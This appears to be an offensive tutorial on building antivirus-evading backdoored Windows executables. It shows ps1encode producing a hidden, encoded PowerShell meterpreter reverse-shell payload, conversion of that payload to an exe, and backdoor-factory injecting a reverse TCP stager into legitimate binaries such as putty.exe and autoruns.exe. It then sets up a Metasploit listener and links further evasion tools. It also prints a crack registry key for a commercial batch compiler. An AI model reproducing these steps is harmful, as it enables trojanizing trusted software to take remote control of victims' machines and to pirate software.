Anti Detection – PE Backdoor Manufacturing
1.ps1encode
[ blackarch drive_c ]# ps1encode Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd] --32bitexe
-i, --LHOST VALUE Local host IP address
-p, --LPORT VALUE Local host port number
--32bitexe Force 32 bit EXE
-a, --PAYLOAD VALUE Payload to use
-t, --ENCODE VALUE Output format: raw, cmd, vba, vbs, war, exe, java, js, js-rd32, php, hta, cfm, aspx, lnk, sct
ps1encode -i 192.168.1.110 -p 5555 --32bitexe -a windows/meterpreter/reverse_tcp -t cmd >backdoor.cmd
"powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAA
......"
2.battoexe
official website:
https://www.battoexe.com/
direct download link:
https://www.battoexe.com/battoexe.exe
Crack reg file: crack.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Abyssmedia\Quick Batch File Compiler\Settings]
"key"="05A61-D7984-9DD1D-E8D5A"
convert backdoor.cmd to execute file.(Couldn't bypass qiho360)
3.backdoor-factory(eg. autoruns.exe)
source link:https://github.com/secretsquirrel/the-backdoor-factory
---------------------------------------------usage--------------------------------------------------------
-S:检查二进制文件是否支持代码注入
[ blackarch backdoor-factory ]# backdoor-factory -f putty.exe –S
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded
-c: 在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch
[ blackarch backdoor-factory ]# backdoor-factory -f putty.exe -c -l 200
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
Looking for caves with a size of 200 bytes (measured as an integer
[*] Looking for caves
No section
->Begin Cave 0x2c8
->End of Cave 0x400
Size of Cave (int) 312
**************************************************
No section
->Begin Cave 0x403
->End of Cave 0x604
Size of Cave (int) 513
**************************************************
We have a winner: .rdata
->Begin Cave 0xd71
->End of Cave 0xec8
Size of Cave (int) 343
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .rdata
->Begin Cave 0x219b4
->End of Cave 0x21ab8
Size of Cave (int) 260
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .rdata
->Begin Cave 0x21bb7
->End of Cave 0x21cb8
Size of Cave (int) 257
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .rdata
->Begin Cave 0x24d10
->End of Cave 0x24e00
Size of Cave (int) 240
SizeOfRawData 0x24800
PointerToRawData 0x600
End of Raw Data: 0x24e00
**************************************************
We have a winner: .data
->Begin Cave 0x252cc
->End of Cave 0x25399
Size of Cave (int) 205
SizeOfRawData 0xc00
PointerToRawData 0x24e00
End of Raw Data: 0x25a00
**************************************************
We have a winner: .data
->Begin Cave 0x253d3
->End of Cave 0x254b2
Size of Cave (int) 223
SizeOfRawData 0xc00
PointerToRawData 0x24e00
End of Raw Data: 0x25a00
**************************************************
No section
->Begin Cave 0x25ab1
->End of Cave 0x25c0e
Size of Cave (int) 349
**************************************************
We have a winner: .rsrc
->Begin Cave 0x28aaf
->End of Cave 0x28c00
Size of Cave (int) 337
SizeOfRawData 0x3000
PointerToRawData 0x25c00
End of Raw Data: 0x28c00
**************************************************
We have a winner: .xdata
->Begin Cave 0xb0e0b
->End of Cave 0xb1000
Size of Cave (int) 501
SizeOfRawData 0x800
PointerToRawData 0xb0800
End of Raw Data: 0xb1000
**************************************************
No section
->Begin Cave 0xb30cf
->End of Cave 0xb3201
Size of Cave (int) 306
**************************************************
[*] Total of 12 caves found
-s SHELL, –shell=SHELL: 可以使用的有效负载。使用“show”来查看有效载荷
[ blackarch backdoor-factory ]# backdoor-factory -f putty.exe -s show
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded
[ blackarch backdoor-factory ]#backdoor-factory -f `which nc` -s show
[*] Checking file support
[*] System Type Supported: System V
[*] Gathering file info
[!] Only supporting executable elf e_types, things may get weird.
[*] Getting shellcode length
The following LinuxIntelELF64s are available:
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell
------------------------------------------------------------------------------------------------------------
[ blackarch backdoor-factory ]# backdoor-factory -f autoruns.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.115 -P 5555 -o autoruns2.exe
____ ____ ______ __
/ __ )/ __ \/ ____/___ ______/ /_____ _______ __
/ __ / / / / /_ / __ `/ ___/ __/ __ \/ ___/ / / /
/ /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / / / /_/ /
/_____/_____/_/ \__,_/\___/\__/\____/_/ \__, /
/____/
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.4.2
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Gathering file info
[*] Overwriting certificate table pointer
[*] Loading PE in pefile
[*] Parsing data directories
[*] Adding New Section for updated Import Table
[!] Adding VirtualAlloc Thunk in new IAT
[*] Gathering file info
[*] Checking updated IAT for thunks
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 453
[*] All caves lengths: 453
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 453
[*] Available caves:
1. Section Name: .data; Section Begin: 0x89c00 End: 0x8d000; Cave begin: 0x8b94d End: 0x8bb74; Cave Size: 551
2. Section Name: None; Section Begin: None End: None; Cave begin: 0x8ce22 End: 0x8d00a; Cave Size: 488
3. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x974d3 End: 0x97754; Cave Size: 641
4. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x98c13 End: 0x98f64; Cave Size: 849
5. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x99d0f End: 0x99f59; Cave Size: 586
6. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9a737 End: 0x9a981; Cave Size: 586
7. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9bf7b End: 0x9c185; Cave Size: 522
8. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9c69a End: 0x9c874; Cave Size: 474
9. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9d483 End: 0x9d6c0; Cave Size: 573
10. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9d822 End: 0x9de2f; Cave Size: 1549
11. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9f5a8 End: 0x9fc2c; Cave Size: 1668
12. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0x9fdca End: 0xa005b; Cave Size: 657
13. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0xa0a90 End: 0xa0dd4; Cave Size: 836
14. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0xa3f03 End: 0xa4178; Cave Size: 629
15. Section Name: .rsrc; Section Begin: 0x8d000 End: 0xa7400; Cave begin: 0xa448b End: 0xa4708; Cave Size: 637
16. Section Name: .reloc; Section Begin: 0xa7400 End: 0xae400; Cave begin: 0xae230 End: 0xae3fc; Cave Size: 460
**************************************************
[!] Enter your selection: 1
[!] Using selection: 1
[*] Changing flags for section: .data
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File putty2.exe is in the 'backdoored' directory
[ blackarch backdoor-factory ]#msfconsole
msf5>use exploit/multi/handler
msf5>set payload windows/meterpreter/reverse_tcp
msf5>set LHOST 192.168.1.115
msf5>set LPORT 5555
msf5>exploit
4.TheFatRat
https://github.com/Screetsec/TheFatRat
5.Veil
https://github.com/Veil-Framework/Veil/
6.Cminer
https://github.com/EgeBalci/Cminer
